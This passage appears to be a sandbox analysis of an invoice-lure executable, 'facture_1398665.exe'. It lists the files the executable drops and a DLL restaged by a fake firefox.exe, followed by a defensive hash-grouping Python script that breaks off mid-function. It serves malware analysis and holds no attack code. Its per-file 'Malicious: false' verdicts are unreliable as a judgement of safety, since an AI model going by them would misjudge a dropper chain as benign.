C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BKEF7.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.163311181625049

Encrypted: false

MD5: CB4E401CE4FC657CCEBB85F96840CC8B

SHA1: 359910F84B5FAF0D194D534C2F631DB5074EA28D

SHA-256: B90BFFA9E03FFD4ECF1D0D709C60F61D13490E84C4550EF06586BC9B1024ED00

SHA-512: 382DF8909DC347DD86696756CD22650EE9BE45146FFDF3B400DA4E370C7C42BCDD4C7FDB807E5A9161211B975B9750EE6CB2B2E2132AAD9D3F90DB9956C2275E

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BVQS8.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.132065899718217

Encrypted: false

MD5: B53D96644F5774FE29BA8BB12D6E5F66

SHA1: 260CBBADA90E29EE8E308996E973CE635496D53C

SHA-256: BE19250A19ED49CE247999D6F0B953EDC2AB7C66B46F1CFBD0C24BE91B84B297

SHA-512: E894CAE26EA86325A9012EC2A00086E136AFE64F38F8DA8B3C5EE1CCAD87B1DCF502AD41E050C1ECFBC1C45D2C69A3C35C5322765EF92DDAF00E5E9953F3436F

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-CPP49.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 20672

Entropy (8bit): 7.088938940487771

Encrypted: false

MD5: 41A0D67BA3833D230F1229FF058BE057

SHA1: A66FDA76D97D059067F11C3E03869A1B9DA439A0

SHA-256: 4F11443A2FA6C714D3E33597F0D08DE4E11A6A2FDB7DE2E4A01ADDD5977665C5

SHA-512: A4138CC25AC899059A702F4E078E7662F15B7059089E53B6EB1A78A1BBEBC03704421BDD0A5FCBDFFD48BE2842D587E4E3E56D881F0462F60CDDC5C75FC14F2F

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-E6HJR.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: ASCII text, with no line terminators

Size (bytes): 11

Entropy (8bit): 2.5503407095463886

Encrypted: false

MD5: E930CCBB2F833479DD58E27A9288E128

SHA1: D58BDF26572FD015652227C9DF78AA345F4A1F80

SHA-256: F039C6C3630501F9476043356BA47B050AFDE8D534438A7E3A7135D792484932

SHA-512: 3E42C62699C0B5D2343E6FE872B11D3AD8D75104F946EC09AA48B129F3C090EDCEC9FFAEDF143AF478838E515E4D4C14FE45390C9E3ED24A1E9EB0FC3F965A06

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ENSEN.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 19136

Entropy (8bit): 7.07970746470874

Encrypted: false

MD5: 93FD7C2F4A8007521E2D1A73B6C21E6F

SHA1: FA2F6A112876613C8DB0276644F229F0C13EDAD1

SHA-256: 3737D7875668EB4812AB01FE82226D758D480128C76BC234806BFD40694CF048

SHA-512: 2390C17625E3377980E0B267E14EF572CF0E88F30A392C7E64A941F2FA98ED9D054B06ADC583FB44CD777D610F7F3CC4D5D26982D297D7DF938263F92AD5A876

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-EOC8V.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 25792

Entropy (8bit): 6.781766293773302

Encrypted: false

MD5: 66F65B59DFF2F8927DC3C8045D8C3A0A

SHA1: AE459D1B4D6615587D8B9133EC72162C717287FC

SHA-256: 414A2BD84B042E2CCF758270647BCFA02D78EB0125C0584DD53F7245481D66B9

SHA-512: 4FA559F7E3B423A736081A67C8A19084288A870307547B19B2DCCAD935AFDC56311A2045CEB4791D1CA33A05F7F1F906C21363A2076436431A118667F298D577

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-F0F55.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 24256

Entropy (8bit): 6.8602671281732635

Encrypted: false

MD5: E65F76759251845FA1E6A3CF41B5F231

SHA1: DE4517EB0D8B330D3C2717E786F485150CAF82EC

SHA-256: 034A8ABF2BF027AD950FDF8FBDF488188C8D02EBA8E160AA95DE376FF1F32FE6

SHA-512: AFC7D0A26B2FFEFB43846D621585FC35A2CE280EEF1D046DA5A327F20AE7B023CCEB2BFD64176787AB86A76567E233215427686243E62ECA5DED1AD14B19B5B5

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-H27TI.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.135353533119842

Encrypted: false

MD5: 2674310F6FC087862B215B26A5D6DA5B

SHA1: 6E226A29124716FB6C5C54CBBF3C2B6F727C9E5A

SHA-256: E29EAA099BE15958CB65D03D47959CAE2DAC342402856C5F0E4DA672193C329D

SHA-512: 86964E2A71A32D7FD0C6F3061ECBE66DD10D4938E0F5E3572F962B53107524259F62001BDFF7E4C9173A6B8270F46B76C1037DC69B8343F10E4B4E59BD8D6782

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-HRJGD.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 17600

Entropy (8bit): 7.2077822511556215

Encrypted: false

MD5: 405BB6A7CD56CBF5276C3A8DC631963D

SHA1: B4CF791ACE3F6790D45B54A0E6AEB6EBAC748C97

SHA-256: F654E56C4299F507BC34271B6BAA29290FD4919B853E17D7470596CAD779F063

SHA-512: EC892ECE3EB6A211BB8A03F5C5FEBDC4D2F6667079E38A17E3D59195D519E95B03063A3957D4F1180B232A67A2487F8A2D3D2F9312390FEABBD78FADAD1E9FD4

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-IEU03.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.081899405376927

Encrypted: false

MD5: F4604E259459F5A0D5BE6914A6D4C5FB

SHA1: E17011A4C93F88D558A3DD606D99E78FC58837E2

SHA-256: BCE066193FEB60B08EDF4CBEB490AAAA5DFFEB8A63A720CADF948748A9AF4B8F

SHA-512: 3320207D4E2B25C0B77062DF7A7D9761CA04E92D08E1435F2FA0CD040C7631C02BADDC8926475AE109284BC78DA5C16840B439D29A17C47792123350746E2461

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-J5TU2.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 19136

Entropy (8bit): 7.067790575145041

Encrypted: false

MD5: E4D419A1897B507E01F75EF88457979F

SHA1: 5C769D5E7FCECBF384D09F340E7DCEB951A2F9C6

SHA-256: 3A2355A23874342777391B4A06C5CDCD990DED287CC4A27FDF0A071AC3B229AD

SHA-512: 65EDB60FD6E897EE2AC74976C47A8B55B8C45BB707C8F1134D78517D0883A16634A3C6142F3A925BE0441D594EEBE90149675D38E4A8DF23D6A68F163F60E611

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-K7B63.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 17600

Entropy (8bit): 7.194045699834861

Encrypted: false

MD5: 0AE94670FBD69ED5F8C923B75CE2C0BD

SHA1: ED53B6E73B867E23881244926B0DEA1524515672

SHA-256: 6D541B215CFA452E54DC6AF9317A7FC24043FA465EF2B561E0F245A4870B2705

SHA-512: 64886E61537830F013A576E40F83D5BC057EFBAB1F3839D5F30A98CBEAAE62F916EF2AFBA6EC9F7CEFDA89907DDA9F704105CAE59CB880F8148F34F3F011562B

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-KMNP5.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.094588451141472

Encrypted: false

MD5: 1B5A116DAF8D01FDD0488666803DB17F

SHA1: DA47F3A722A75AE04662B5A6C486DEC6AE7379EA

SHA-256: 48D491B08D395A8AC47CC22A70D1C3F5E84D716AFE2678E825F24492E8FF2ED4

SHA-512: 4E4FDF0AEF5DD17F314A4B93AE521FD3E9E6B5C06EE17688DDEB280BA5C42FC72C75DB745B83ECEB740E5A747C0ABE07627457D6CCB0692DC5E65C96BDE96509

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L6BIN.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.177990634000795

Encrypted: false

MD5: 0AEAF9CE58CBD0AF1E30D03B45C21F81

SHA1: 1EC04DCA23EB4D28861A16D5CCA0D4FEB91E2E32

SHA-256: 9A5952C82CBCB1A8ECE9C51C258667D9AB96D13EC6455873999FF0BF78C3CAB0

SHA-512: 49F9D30694F6C272E6CB84F71B3801DFF5256D25AC9479ACC6577038783E8B62E36BD0A5A8D07E618830E64749F92DEE0454DD88E132B333D558319FB282EF7A

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L7E6Q.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 22208

Entropy (8bit): 6.921271327164854

Encrypted: false

MD5: BC0BE695E63548171105C57D2E9B98E7

SHA1: 0C4506B330487C4B45900B06DFE0A3249F6B9D88

SHA-256: D16C5B0E19870E86354B5E6CDC4C81E80777749F6BBE6B675F680CEC0FFAE35D

SHA-512: 095EF210F55233A0C0EB80FC2D94646DE96CB2E66D1994D631FA82E5A71A5C26B32D33ABC19AC69E64BD3E4789EB1A7595818A90494038EA1771C210CD81CB2A

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-LQISF.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.081538661952178

Encrypted: false

MD5: 6BFBF95B7253F32A77BACDF119B678F3

SHA1: 3E3522A9D62940E1E3C0ED6F785AF0B5E3A33600

SHA-256: 9FC2486ED5D3FFF78DEB69A7386F4575451D43B67F759AFB056AC66B82041E3D

SHA-512: 603A5A199A19028B2E496051772517C488FD3FCC05DD6BEC51E15C58DAD2981F7DAB44C3D7E1BE836AFE8F3CF35AC90E574F0062737C353079E33096DBA26F10

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-MQDR2.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 20160

Entropy (8bit): 7.084485679603242

Encrypted: false

MD5: 07BA5F40C64134E5749DF0E8CFEE082E

SHA1: 5B872A7EA316B6B3BA604B88045B9B6F34BA4C8B

SHA-256: 136E5DE4B535AABF6368C06F82339D2EF6C34165661F40433BCEF4EBB90B30FE

SHA-512: 55B5C739D08F5627D9453709CC0D3D20C3FC08E9A1168F70381B49F8FDC8D91F15DB85DB51D47AAAE612CBE920BB3BA83075E74888B2D62E3A962F181B3D2C12

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NGCIJ.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.1097867214760235

Encrypted: false

MD5: 0A0084D4B3635E4D8EBAB587DCFCC16C

SHA1: 5619483328D58AD6B4D2A8A860DABED1BBDB8091

SHA-256: 5089484C8C56AC8E095CADC3DC971DF71EDEB52F856940632821FD37E81AE5CA

SHA-512: D50989131E3B66335F9972E46D056FF1CE585AC90877C388B35BC66E285D24CC4FBC6688F62543CAF3DF86D3E3D1087BDC2822C9F69B0978E35BB727FE47B58B

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-NOVNE.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 17600

Entropy (8bit): 7.201487233811755

Encrypted: false

MD5: E205DE17A85B0C3352A6857EF9B3C6DD

SHA1: 5FE8A292A9D6653136F612FE2C9B45F2F1B08C96

SHA-256: 29B23370474BE0C459CC47863603167CC7191F58318BD29877225FCBF2454215

SHA-512: 6279922FCB3ACCBAC15406815DDC557735346245172285CF1C368434B45C9EFBAFDF8215CE6112292BFD4B2C8EB4642A0560CAE17337D6F51D86137C41B12D6C

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-O6IQ7.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.167129892042716

Encrypted: false

MD5: 87B1814412CDAC3D08FAD8DD3A79EBAD

SHA1: CA1946721D023BE9825A5AFAC4364248A56111E1

SHA-256: 2F4690B3C2587C0BFB81AB701D50E497406994613151FAF007423C59CA5E2281

SHA-512: 999D6EEB454760A422FAB3B1F1D3DE6B99789838FDFE88F78A3AF52842672F67BB4CA05AE157BF68CEE6D96A1F4B0924555DA67A4FFAD9DB9044E411E071D206

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QD0HG.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.169892235758202

Encrypted: false

MD5: FD14FCD1550F17701FBF239645B606FA

SHA1: 0D7B1DE80DB94DABAD3CE91D31FDA1A8A1A6CFAB

SHA-256: A5453CD2B5E98D40CA17DD20A8F5974F29DE7236A076867A3BC3CBCA441BE928

SHA-512: 162559D9E6E36BFFE32BE41F75075E711E6947ADAB2AD3BB37CF03E02E787AD5A6F3FB93AF4B6C3F82E1107DC401D32DBD53FCBA39F85839910E852C1109DB5B

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QG57B.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 19136

Entropy (8bit): 7.06770071137197

Encrypted: false

MD5: 87E0EF2D5DF6F6E18E6EA9171E3D77E7

SHA1: EB6A1D8D169A683BD1357877AC94BFC98799FEEB

SHA-256: 9B5A5536AED84D45A00DA1056AF4762FEC805EABA742C6BF2D2FCA60993711BB

SHA-512: AB0CB69F13793604E7D3BB97D6CEE38CCA0CDB4889C10F228119713902211C0AEB8A493307FAAC614D05A669BD2E172D83C0AED494751D50DE1874D4AA90D379

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-R06PT.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: JPEG image data, JFIF standard 1.02

Size (bytes): 22117

Entropy (8bit): 7.966262180259871

Encrypted: false

MD5: 2EACE55C93918524BD2F8F06B4DDBEB3

SHA1: 8EB9A69D877C96603C2F26E895BF1DC89CF1927E

SHA-256: 667BE8442298610861B8561DA6E2F4005857D0AB076A3A8FF578D9B7E3DA729E

SHA-512: DE0D89C1AC2C5C99B8607E49D2F6AE7D6BE79748BE71DE5A74B6A193A92E4CB0C600230A3893AA9C595CB3632051876507F527EB4155FFFFA1A5E253EDC21755

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-RQQDV.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.128506970533883

Encrypted: false

MD5: 8F239C629F09E1B49CF1F03304AB8E69

SHA1: D54DBE7E79A8389B3BAE3273487BC22D4B99781A

SHA-256: D8D74FB87F94A587582D56934816362B992B712E47C39F13D957058F17724886

SHA-512: 130D1BB38C757BBCE7B3C558624028C771FA1198B8D02F0BE1F210A688E5779F8FCBB44154678E898D6FBA4EC31D03664CC84D063816E977361D4ECABAD7911E

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-S9A25.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 20160

Entropy (8bit): 7.084664816938566

Encrypted: false

MD5: 066874FF22E1C100DC56C4AE76D2E1C2

SHA1: 896031A6BB845525A6AAB4B56A4DB2805E797A65

SHA-256: 979FF0E25E7EA00B8714C9EF2DC8417E69AFAC137EA88F77F8F5A9FFEAA31923

SHA-512: 0DCF7F1956C980CDBBA6279C7E4D80F30D85AA37D3507166E0B67F008FCFABD00CB8E27532A362218EF3EBF66D92CA3D97A23D1028B83DFFE36AA6E953F3D83E

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SJFE0.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 19136

Entropy (8bit): 7.06799010155914

Encrypted: false

MD5: 1A16AB59D63A2D6A37D3ABD032958631

SHA1: FC76579F19ABB0F24E1AFEA30E1C85FFED6CBC0F

SHA-256: 81926C2B97A7B01061C5042DA0005F0B64FE9E07852478B2A65E8A8EB5560B1F

SHA-512: F3808B1566193AA9024B30477A530CD616174E8B310D455A368F89B2BC6C90D998F4CC611030F7801CBBEB3598DDF78968D628C56C44ED1631A3262159AFD4D7

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SNF6L.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 28864

Entropy (8bit): 6.66295566360206

Encrypted: false

MD5: 49A69484B524C6F9FD641E015DD15154

SHA1: F6EC9E38D05ED66E8431B909ABA0451EF8C9B540

SHA-256: 69C637C0BE7DDFE0690D8C642EC6D0850085617C3C3DDA9531CAC818F06F66E8

SHA-512: 802D186F4B580541916C038999C0653765F2CB01C345549F6D927F7688B671B234C7EE05F2A9EBA6C139F25C459E579DA4437EE2AC03ED3FE3EBEF849F178553

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-TLFG5.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Size (bytes): 531408

Entropy (8bit): 6.731849192407803

Encrypted: false

MD5: 52FFABA4273678BAE75442F2BC85B470

SHA1: 66A4C6CF92A4190A1480FD2B19AC84952FA715BD

SHA-256: 70225F14A28007815B0410B1F41F7EA6A16B6329FD69F7EC06386B05862CF5C4

SHA-512: 4D6E222378CC99B7CA64EC6738B97504201364760E94BA0276F272860608952E5A260B70A28246D6857404209C7B2ECEFD0C22EBA59B3788069DA7A1B39266F2

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UJ2Q7.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.1620766534253555

Encrypted: false

MD5: AD895B2A99A3EC18F1690BBAC1E2037A

SHA1: 19FAB11CA8D2AB4A3C1A863209CBDC77A69E1AED

SHA-256: A11C772B2451B0C9C706B03381819E4A1DEF3E2FBBBA8362509BBE57DBD5C666

SHA-512: D021A5B8451BB8BAC27B4F496A1A25E0A2B2F90C93A7E27850303C5FEB9441F9B926B13EF024C176827E190F2DC04F401205983510DFAB0946674D18994BBE8F

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UPNUP.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 22720

Entropy (8bit): 6.942253423928934

Encrypted: false

MD5: 11218C9F81404A51D1EB6B56BA60F9AB

SHA1: ACC303D1B1A5822ED7BCF8F666860A0A7AAFFE91

SHA-256: 882DA90B6368056908E9CD21C4719A016E9A3CA597ECA9183892A5806B4A8D4A

SHA-512: 86928D70AEC7BD7170863C0CDEA110F8A4AA244EFB30577310AD1908D71817B8A2AEB45833D5F710B15DF8FE096234CFB069819B0F2B706CFCD15B5614615929

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 112640

Entropy (8bit): 7.499598784189305

Encrypted: false

MD5: 8272DAAC35E741D2F9CE6E67745BD1BC

SHA1: 7E0C542E73F12EA50797E2D8B22C461046111109

SHA-256: 2216259093B9BA13859287AA6944B1F0341C80386E55294583A27A2542FC99F9

SHA-512: 8AB688A50C8C8045239484B41EA8F03CD06A1100BC375A3684677B55EC22F613CF79B360AC84DAB82F7E62285832667DC338BF8A10EF78F4C23F6EA059C54892

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

Process: C:\Users\user\Desktop\facture_1398665.exe

File Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Size (bytes): 1228800

Entropy (8bit): 6.459892876394132

Encrypted: false

MD5: 9AE8DFC6C5CB2222DBD09F1176058373

SHA1: 28A62A8262AC325E800DA8363F00511503E569B3

SHA-256: 489D6308B6B6109E76D132586BA861E1F4ECCBB814AB68FB1DCD2944D6787FA4

SHA-512: 289C2A884CB8C1C37F5CF8BCDAC5BE5813A02402267749B69DD1820BBF401A6DB3D8913A7695B93E1B2CFF306730AA829DBF0DA0B443B63C58719DC4672F65AE

Malicious: false

Reputation: low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Process: C:\Windows\System32\dllhost.exe

File Type: Microsoft Cabinet archive data, 6509 bytes, 1 file

Size (bytes): 19527

Entropy (8bit): 7.96414732129194

Encrypted: false

MD5: DA4ABC8C9A1FCFA4161EFE06CB2935AF

SHA1: E33672FBA3E351EF2BB6F0C62DB1A5C3EEA0A1F9

SHA-256: C25B1A0AFC65B15A4B2278A85B519A33164987284C71BDA4D848D852CC25DB46

SHA-512: 2E59E847EBFDD74F752CD6E974075EA69B5DAA7AA5CEA092DE9C5BB35BB8748905CCEA7C7B041D7C30847EAB0FF6FFB58E4E18217F7B9457E426188C07E1375F

Malicious: false

Reputation: low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Process: C:\Windows\System32\dllhost.exe

File Type: data

Size (bytes): 1026

Entropy (8bit): 3.129049618580033

Encrypted: false

MD5: 4F11D774C041FCB39FD9772B4B92575D

SHA1: 74E0705B4B8E6703C981BDAC48C17D12CE86C800

SHA-256: 56FA377E0CCDF9258C71FC909DFB070A2A0F0D9ABB8E15FB375D972D9AD700BF

SHA-512: 70D51E4931BFC3096FCD0536161CAAFCDA703C04BF5C197055E43CACBAF476D3F01441E9F09BF869B9D9793B5896C5ED00E98D26BE740299333839142D9CB9C6

Malicious: false

Reputation: low

C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dll

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 112640

Entropy (8bit): 7.499598784189305

Encrypted: false

MD5: 8272DAAC35E741D2F9CE6E67745BD1BC

SHA1: 7E0C542E73F12EA50797E2D8B22C461046111109

SHA-256: 2216259093B9BA13859287AA6944B1F0341C80386E55294583A27A2542FC99F9

SHA-512: 8AB688A50C8C8045239484B41EA8F03CD06A1100BC375A3684677B55EC22F613CF79B360AC84DAB82F7E62285832667DC338BF8A10EF78F4C23F6EA059C54892

Malicious: false

Reputation: low
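
The LOL_DLL.dll record above is written by a firefox.exe that runs from the installer's own temp directory (Temp\is-7I2SS.tmp), and its size, MD5, SHA1, SHA-256 and SHA-512 are identical to those of Temp\is-7I2SS.tmp\is-VQCNU.tmp, which facture_1398665.tmp dropped earlier in this listing; the api-ms-win-core-*.dll records that follow repeat the pattern (for example is-IEU03.tmp and api-ms-win-core-console-l1-1-0.dll share BCE06619...). The per-file "Malicious: false" and "Reputation: low" verdicts say nothing about that relationship, because they are computed on each file in isolation. The script below is an added example, not part of the Joe Security report: it parses records laid out the way this listing prints them (path line, then "Field: value" lines, blank line between records), groups them by SHA-256, and reports which staged files reappear under another path written by a different process. The five embedded records are copied from this listing and trimmed to the fields the script needs; the "restaged" interpretation of a hash match across processes is this example's own, not a report verdict.

```python
import re
from collections import defaultdict

# Constructed sample input: five records copied from the dropped-file listing
# of this report, reduced to the fields the script uses, in the report's own
# layout (path on its own line, then "Field: value" lines).
SAMPLE_RECORDS = r"""
C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmp
Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
Size (bytes): 112640
SHA-256: 2216259093B9BA13859287AA6944B1F0341C80386E55294583A27A2542FC99F9
Malicious: false

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-IEU03.tmp
Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp
Size (bytes): 18624
SHA-256: BCE066193FEB60B08EDF4CBEB490AAAA5DFFEB8A63A720CADF948748A9AF4B8F
Malicious: false

C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dll
Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
Size (bytes): 112640
SHA-256: 2216259093B9BA13859287AA6944B1F0341C80386E55294583A27A2542FC99F9
Malicious: false

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-console-l1-1-0.dll
Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
Size (bytes): 18624
SHA-256: BCE066193FEB60B08EDF4CBEB490AAAA5DFFEB8A63A720CADF948748A9AF4B8F
Malicious: false

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-1-0.dll
Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe
Size (bytes): 21696
SHA-256: 71C87C14BC1BD0B20D9F68D4943E93C4C6DDC1B6CF252938BB15FE562552F93E
Malicious: false
"""

# A "Field: value" line; field names may carry spaces, parentheses and
# hyphens ("Size (bytes)", "SHA-256").
FIELD_RE = re.compile(r"^([A-Za-z0-9 ()-]+): (.*)$")


def parse_records(text):
    """One dict per dropped file: 'path' plus every Field: value pair.
    Records are separated by blank lines; the first line is the path."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        if not lines:
            continue
        rec = {"path": lines[0]}
        for line in lines[1:]:
            m = FIELD_RE.match(line)
            if m:
                rec[m.group(1)] = m.group(2)
        records.append(rec)
    return records


def group_by_sha256(records):
    """Index records by SHA-256 so identical bytes under different paths line up."""
    by_hash = defaultdict(list)
    for rec in records:
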